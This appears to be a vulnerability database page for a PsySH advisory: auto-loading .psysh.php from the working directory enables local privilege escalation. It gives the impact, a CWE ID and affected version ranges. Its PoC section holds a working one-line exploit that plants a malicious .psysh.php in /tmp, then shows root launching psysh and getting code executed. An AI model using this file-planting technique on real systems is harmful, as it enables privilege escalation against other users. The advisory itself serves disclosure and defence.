GHSA-4486-gxhx-5mg7

Suggest an improvement
Source
https://github.com/advisories/GHSA-4486-gxhx-5mg7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-4486-gxhx-5mg7/GHSA-4486-gxhx-5mg7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4486-gxhx-5mg7
Aliases
Published
2026-01-30T21:28:44Z
Modified
2026-02-03T03:13:39Z
Severity
  • 6.7 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
PsySH has Local Privilege Escalation via CWD .psysh.php auto-load
Details

Summary

PsySH automatically loads and executes a .psysh.php file from the Current Working Directory (CWD) on startup. If an attacker can write to a directory that a victim later uses as their CWD when launching PsySH, the attacker can trigger arbitrary code execution in the victim's context. When the victim runs PsySH with elevated privileges (e.g., root), this results in local privilege escalation.

Details

PsySH supports per-directory configuration via a .psysh.php file located in the process CWD. This file is executed implicitly when PsySH starts, without requiring explicit opt-in and without validating that the file and directory are safe (e.g., owned by the current user and not group/world-writable).

This enables a CWD poisoning scenario: a low-privileged user can plant a malicious .psysh.php in any directory they can write to, then wait for a higher-privileged user to start PsySH while their shell is in that directory.

PoC

  1. As a low-privileged user, create a malicious .psysh.php in an attacker-writable directory (example: /tmp):
bob@localhost:/tmp$ echo "<?php system('id > poc.txt'); ?>" > .psysh.php
bob@localhost:/tmp# ls -lah .psysh.php
-rw-r--r-- 1 bob bob 33 Jan 28 11:17 .psysh.php
  1. As the victim user, start PsySH with CWD set to that directory and exit:
root@localhost:/tmp# cd /tmp
root@localhost:/tmp# ./psysh
Psy Shell v0.12.18 (PHP 8.1.2-1ubuntu2.23 — cli) by Justin Hileman
New PHP manual is available (latest: 3.0.1). Update with `doc --update-manual`
> exit

   INFO  Goodbye.

  1. Verify code execution triggered in the victim context:
bob@localhost:/tmp$ ls -lah poc.txt
-rw-r--r-- 1 root root 39 Jan 28 11:19 poc.txt
bob@localhost:/tmp$ cat poc.txt
uid=0(root) gid=0(root) groups=0(root)

Impact

This is a CWD configuration poisoning issue leading to arbitrary code execution in the victim user’s context. If a privileged user (e.g., root, a CI runner, or an ops/debug account) launches PsySH with CWD set to an attacker-writable directory containing a malicious .psysh.php, the attacker can execute commands with that privileged user’s permissions, resulting in local privilege escalation.

Downstream consumers that embed PsySH inherit this risk. For example, Laravel Tinker (php artisan tinker) uses PsySH. If a privileged user runs Tinker while their shell is in an attacker-writable directory, the .psysh.php auto-load behavior can be abused in the same way to execute attacker-controlled code under the victim’s privileges.

Database specific
{
    "cwe_ids":  [
        "CWE-427"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-01-30T21:28:44Z",
    "nvd_published_at":  "2026-01-30T21:15:58Z",
    "severity":  "MODERATE"
}
References

Affected packages

Packagist / psy/psysh

Package

Name
psy/psysh
Purl
pkg:composer/psy/psysh

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.12.0
Fixed
0.12.19

Affected versions

v0.*
v0.12.0
v0.12.1
v0.12.2
v0.12.3
v0.12.4
v0.12.5
v0.12.6
v0.12.7
v0.12.8
v0.12.9
v0.12.10
v0.12.11
v0.12.12
v0.12.13
v0.12.14
v0.12.15
v0.12.16
v0.12.17
v0.12.18

Database specific

last_known_affected_version_range
"<= 0.12.18"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-4486-gxhx-5mg7/GHSA-4486-gxhx-5mg7.json"

Packagist / psy/psysh

Package

Name
psy/psysh
Purl
pkg:composer/psy/psysh

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.11.23

Affected versions

v0.*
v0.1.0
v0.1.1
v0.1.2
v0.1.3
v0.1.4
v0.1.5
v0.1.6
v0.1.7
v0.1.8
v0.1.9
v0.1.10
v0.1.11
v0.1.12
v0.2.0
v0.2.1
v0.3.0
v0.3.1
v0.3.2
v0.3.3
v0.3.4
v0.3.5
v0.4.0
v0.4.1
v0.4.2
v0.4.3
v0.4.4
v0.5.0
v0.5.1
v0.5.2
v0.6.0
v0.6.1
v0.7.0
v0.7.1
v0.7.2
v0.8.0
v0.8.1
v0.8.2
v0.8.3
v0.8.4
v0.8.5
v0.8.6
v0.8.7
v0.8.8
v0.8.9
v0.8.10
v0.8.11
v0.8.12
v0.8.13
v0.8.14
v0.8.15
v0.8.16
v0.8.17
v0.8.18
v0.9.0
v0.9.1
v0.9.2
v0.9.3
v0.9.4
v0.9.5
v0.9.6
v0.9.7
v0.9.8
v0.9.9
v0.9.11
v0.9.12
v0.10.0
v0.10.2
v0.10.3
v0.10.4
v0.10.5
v0.10.6
v0.10.7
v0.10.8
v0.10.9
v0.10.10
v0.10.11
v0.10.12
v0.11.0
v0.11.1
v0.11.2
v0.11.3
v0.11.4
v0.11.5
v0.11.6
v0.11.7
v0.11.8
v0.11.9
v0.11.10
v0.11.11
v0.11.12
v0.11.13
v0.11.14
v0.11.15
v0.11.16
v0.11.17
v0.11.18
v0.11.19
v0.11.20
v0.11.21
v0.11.22

Database specific

last_known_affected_version_range
"<= 0.11.22"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-4486-gxhx-5mg7/GHSA-4486-gxhx-5mg7.json"